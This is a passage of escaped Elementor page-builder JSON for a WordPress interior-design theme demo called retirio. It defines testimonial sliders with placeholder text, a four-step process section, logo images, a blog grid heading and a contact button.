kground\":\"classic\",\"background_color\":\"#F5F5F5\",\"padding\":{\"unit\":\"px\",\"top\":\"110\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"be465bf\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0c50faf\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Real Testimonials\",\"title\":\"What they\\u2019re talking\\nabout retirio\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-17\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"25\",\"bottom\":\"0\",\"left\":\"25\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"27fa0e5\",\"elType\":\"widget\",\"settings\":{\"version\":\"version_1\",\"tab_item\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"4735f8c\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"71b5562\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/jessica.jpg\",\"id\":1416,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-line-yellow.png\",\"id\":1422,\"alt\":\"\",\"source\":\"library\"},\"background_color_item\":\"#DDAD58\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"705dd08\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_repeat\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_color_item\":\"#1B1B1B\"},{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"8eb7d44\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mike-hardson.jpg\",\"id\":1417,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_repeat\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"23b7d8f\"},{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"image_author\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/kevin-martin.jpg\",\"id\":1415,\"alt\":\"\",\"source\":\"library\"},\"background_image_background\":\"classic\",\"background_image_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/Base.png\",\"id\":1421,\"alt\":\"\",\"source\":\"library\"},\"background_image_position\":\"initial\",\"background_image_position_tablet\":\"initial\",\"background_image_position_mobile\":\"initial\",\"background_image_xpos\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_image_xpos_mobile\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"background_image_ypos\":{\"unit\":\"%\",\"size\":103,\"sizes\":[]},\"background_image_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_image_repeat\":\"no-repeat\",\"background_image_repeat_mobile\":\"no-repeat\",\"background_image_size\":\"contain\",\"background_image_size_tablet\":\"cover\",\"background_image_size_mobile\":\"cover\",\"background_color_item\":\"#1B1B1B\",\"_id\":\"6c7e338\"}],\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-280\",\"left\":\"0\",\"isLinked\":false},\"icon_quote\":{\"value\":\"flaticon flaticon-quotes\",\"library\":\"flaticon\"},\"tab_item_v2\":[{\"name_author\":\"Kevin martin\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"cf6d2b9\"},{\"name_author\":\"Jessica brown \",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"e73dd09\"},{\"name_author\":\"Mike hardson\",\"job\":\"Our customer\",\"testimonial\":\"Through a unique combination of engineering, construction design disciplines and expertise, Concor delivers world class infrastructure solutions.\",\"_id\":\"127b5e7\"}],\"tab_item_v3\":[{\"name_author\":\"Kevin martin\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"163297c\"},{\"name_author\":\"Jessica brown \",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"bcfaaf7\"},{\"name_author\":\"Mike hardson\",\"job\":\"Customer\",\"testimonial\":\"This is due to their excellent service, competitive pricing and customer support. It\\u2019s throughly refresing to get such a personal touch. Duis aute lorem ipsum is simply free text irure dolor in velit esse.\",\"_id\":\"80c4005\"}],\"icon_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"dot_control\":\"yes\",\"_animation\":\"bounceInUp\",\"autoplay\":\"\"},\"elements\":[],\"widgetType\":\"retirio_elementor_testimonial\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f7c9652\",\"elType\":\"section\",\"settings\":{\"padding\":{\"unit\":\"px\",\"top\":\"327\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"297\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"77dbf66\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"080887e\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Our process\",\"title\":\"4 easy work steps\",\"_animation\":\"ova-move-down\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"_animation_tablet\":\"none\",\"animation_duration\":\"fast\",\"_animation_delay\":100},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"ec83ee9\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"margin\":{\"unit\":\"px\",\"top\":\"50\",\"right\":0,\"bottom\":\"120\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":0,\"bottom\":\"90\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":0,\"bottom\":\"30\",\"left\":0,\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"a992324\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-1.png\",\"id\":3838,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"65\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"background_position_tablet\":\"initial\",\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":150,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"top\",\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"background_ypos\":{\"unit\":\"px\",\"size\":-1,\"sizes\":[]}},\"elements\":[{\"id\":\"fd3636d\",\"elType\":\"widget\",\"settings\":{\"text\":\"Design\\nconcept \\n\",\"numerical_order\":\"01\",\"top_order\":{\"unit\":\"px\",\"size\":-24,\"sizes\":[]},\"right_order\":{\"unit\":\"px\",\"size\":-80,\"sizes\":[]},\"_element_width_mobile\":\"auto\",\"bottom_mobile\":{\"unit\":\"px\",\"size\":175,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"b9984a7\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-2.png\",\"id\":3839,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":140,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"55\",\"right\":\"0\",\"bottom\":\"65\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"bottom\",\"background_position_tablet\":\"initial\",\"margin_mobile\":{\"unit\":\"px\",\"top\":\"120\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation_delay\":250},\"elements\":[{\"id\":\"aba257a\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-interior-design\",\"library\":\"flaticon\"},\"text\":\"Design\\nschematic \\n\",\"numerical_order\":\"02\",\"text_position\":\"top-left\",\"_element_width_mobile\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"24d2339\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-1.png\",\"id\":3838,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":57,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"65\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"background_position_tablet\":\"initial\",\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"top\",\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"animation_delay\":500},\"elements\":[{\"id\":\"0f2ef7d\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-development\",\"library\":\"flaticon\"},\"text\":\"Design\\ndevelopment\",\"numerical_order\":\"03\",\"top_order\":{\"unit\":\"px\",\"size\":-27,\"sizes\":[]},\"_element_width_mobile\":\"auto\",\"bottom_mobile\":{\"unit\":\"px\",\"size\":175,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"d6ce61d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"_inline_size_tablet\":50,\"content_position_tablet\":\"bottom\",\"align_tablet\":\"center\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-2.png\",\"id\":3839,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_position_tablet\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-100,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":140,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-100,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"55\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"animation_delay\":750},\"elements\":[{\"id\":\"020e37a\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-construction\",\"library\":\"flaticon\"},\"text\":\"Construction\\ndevelopment\",\"numerical_order\":\"04\",\"text_position\":\"top-left\",\"_element_width_mobile\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cbd0171\",\"elType\":\"section\",\"settings\":{\"structure\":\"60\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"0137b13\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":17.178,\"_inline_size_tablet\":33,\"background_background\":\"classic\",\"background_image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5387f04\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/01-test.png\",\"id\":1901,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0238cd9\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":16.427,\"_inline_size_tablet\":33,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"2140ada\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/02-home1.png\",\"id\":1903,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"22014c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":15.06,\"_inline_size_tablet\":33,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"812d896\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/03-home1.png\",\"id\":1904,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"282c361\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":13.587,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7e86368\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/04-home1.png\",\"id\":1905,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"44b0fc9\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":17.368,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"78697fd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/05-home1.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"861133d\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":18.375,\"_inline_size_tablet\":33},\"elements\":[{\"id\":\"10e265f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/06-home1.png\",\"id\":1907,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9e0e567\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"107\",\"right\":0,\"bottom\":\"80\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"67\",\"right\":0,\"bottom\":\"50\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"5ed1170\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"bb1865f\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Direct from the blog posts\",\"title\":\"\\nCheckout our latest news\\nand articles\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"content_typography_title_font_weight\":\"800\",\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"content_typography_sub_title_font_weight\":\"600\",\"content_typography_sub_title_letter_spacing\":{\"unit\":\"px\",\"size\":2.2,\"sizes\":[]},\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"25f2c71\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"retirio_elementor_blog_grid_2\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a90e77\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#E3B25A\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-get-interior.png\",\"id\":1896,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":1,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_ypos\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"80\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"10\",\"bottom\":\"80\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"f4bedba\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"4440af1\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Hire us for your new projects\",\"title\":\"Get interior designs right now\",\"align_heading\":\"left\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"content_typography_title_font_weight\":\"800\",\"color_title\":\"#FFFFFF\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"content_typography_sub_title_font_weight\":\"400\",\"content_typography_sub_title_text_transform\":\"none\",\"color_sub_title\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":false},{\"id\":\"e99860c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"align_mobile\":\"flex-start\"},\"elements\":[{\"id\":\"8cfb32b\",\"elType\":\"widget\",\"settings\":{\"text\":\"contact with us\",\"typography_typography\":\"custom\",\"typography_text_transform\":\"uppercase\",\"background_color\":\"#242424\",\"hover_color\":\"#E3B25A\",\"text_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"40\",\"bottom\":\"18\",\"left\":\"40\",\"isLinked\":false},\"button_bg_hover\":\"#FFFFFF\",\"button_before_width\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"button_before_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"_element_width\":\"auto\",\"_element_vertical_align\":\"center\",\"link\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/contact\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"800\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e200d46\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"571494c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"178b61f\",\"elType\":\"